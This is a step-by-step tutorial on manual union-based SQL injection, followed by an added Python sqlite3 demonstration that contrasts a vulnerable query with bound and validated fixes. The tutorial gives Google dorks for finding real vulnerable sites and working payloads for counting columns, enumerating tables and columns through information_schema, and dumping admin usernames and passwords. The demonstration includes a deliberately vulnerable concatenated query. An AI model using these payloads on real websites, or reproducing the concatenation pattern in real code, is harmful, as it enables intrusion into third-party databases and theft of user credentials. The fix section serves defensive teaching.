SQL injection Union Based Manually Step by Step

Hello guys, I hope you are doing well. In this tutorial we will discuss basic union-based SQL injection done manually. First, I would recommend that you learn the basics of SQL from w3schools. So let me start with an introduction.

What is SQL Injection?

SQL injection is a type of code injection vulnerability in the database layer. A successful SQL injection exploit can read and modify the backend database. The vulnerability arises when user input is incorrectly filtered before it is used in a SQL query string.

What can an attacker do?

  • An attacker can inject into the website and read and modify the database.
  • An attacker can take control of your admin panel, if you have one.
  • If the targeted website is an e-commerce site and stores customer information, the attacker can easily get it.
  • An attacker can upload a shell and deface the website.

So let's start our work.

Step 1:

Find an SQL injection vulnerable website with Google dorks.

inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:shop.php?id=

Step 2:

Now check for the vulnerability by adding a single quote after the id parameter and hitting Enter. If you get an error message such as an SQL syntax error, the site is vulnerable to SQL injection.

www.vulnerablesite.com/index.php?id=1'

Step 3:

If the site is vulnerable, the next step is to find the number of columns using the order by statement.

www.vulnerablesite.com/index.php?id=1' order by 1 --+ [no error]
www.vulnerablesite.com/index.php?id=1' order by 2 --+ [no error]
www.vulnerablesite.com/index.php?id=1' order by 3 --+ [no error]
www.vulnerablesite.com/index.php?id=1' order by 4 --+ [no error]
www.vulnerablesite.com/index.php?id=1' order by 5 --+ [error]

Here I got the error message at order by 5, which means the total number of columns is 5.

Step 4:

Now we will find the vulnerable column using the union command.

www.vulnerablesite.com/index.php?id=1' union select 1,2,3,4 -- +

As you can see in the above image, the vulnerable column is 2. We will use the following commands:

Version - @@version, also version()
Database - database()
Current User - user()

Step 5:

Now we will find the table names. Just paste the query given below into the vulnerable column.

(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE())

Step 6:

Next we will find the column names of a particular table. Just use this query.

www.vulnerablesite.com/index.php?id=1' union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name= [table name in hex]

Now we have the column names of the table, and our next target is to dump the data.

Step 7:

Now we have the database, table name and column names as well, so we will dump the database of the targeted website. Just replace column_name with the target column, for example admin, user, etc., and add from and the targeted table at the end.

www.vulnerablesite.com/index.php?id=1' union select 1,group_concat(username,0x3a,password),3,4 from admin--+

Now we have the username and password.

Keep practising, but don't harm any site.
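
Why the single quote in Step 2 and the union select in Step 4 work, and how the lookup is fixed, shown as an added example that is not part of the original tutorial. It uses Python's sqlite3 in memory instead of PHP/MySQL so it runs offline; the articles table, its row and all function names are constructed for the demonstration.

```python
import sqlite3

def make_db():
    """Constructed sample data: one 4-column table, matching 'union select 1,2,3,4'."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (id INTEGER, title TEXT, body TEXT, author TEXT)")
    db.execute("INSERT INTO articles VALUES (1, 'Hello', 'First post', 'admin')")
    return db

def lookup_vulnerable(db, raw_id):
    # Anti-pattern: the request value becomes part of the SQL text, so a quote
    # in raw_id closes the string literal and the rest is parsed as SQL.
    sql = "SELECT id, title, body, author FROM articles WHERE id = '" + raw_id + "'"
    return db.execute(sql).fetchall()

def lookup_bound_only(db, raw_id):
    # Fix, part 1: bind the value. It travels separately from the SQL text,
    # so it is compared as data and never parsed as SQL.
    return db.execute(
        "SELECT id, title, body, author FROM articles WHERE id = ?", (raw_id,)
    ).fetchall()

def lookup_safe(db, raw_id):
    # Fix, part 2: validate first. An article id is a short run of ASCII digits.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        return []
    return lookup_bound_only(db, int(raw_id))

def probe(lookup, db, raw_id):
    """Return ('rows', n) or ('sql_error', message) for one request value."""
    try:
        return ("rows", len(lookup(db, raw_id)))
    except sqlite3.Error as exc:
        return ("sql_error", str(exc))

if __name__ == "__main__":
    db = make_db()
    # Request values taken from Steps 2 and 4 of the tutorial.
    for value in ["1", "1'", "1' union select 1,2,3,4 -- "]:
        for fn in (lookup_vulnerable, lookup_bound_only, lookup_safe):
            print(f"{fn.__name__:18} {value!r:32} -> {probe(fn, db, value)}")
```

With the concatenated query the quote produces a database error and the union value adds a second row to the result; with the bound query both values simply match no article.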

 

Author: Ahmed Raza Memon

I am a 17-year-old Ethical Hacker, Penetration Tester, Web Security Expert and Exploit Writer from India. My area of expertise includes Ethical Hacking, Vulnerability Assessment, Information Security Audits, Penetration Testing, Exploit Writing, Web Application Security, Source Code Reviews, Forensic Investigation and Cyber Law. I have been acknowledged by many top companies like Microsoft, Apple, SAP, AOL, Sony and many more.
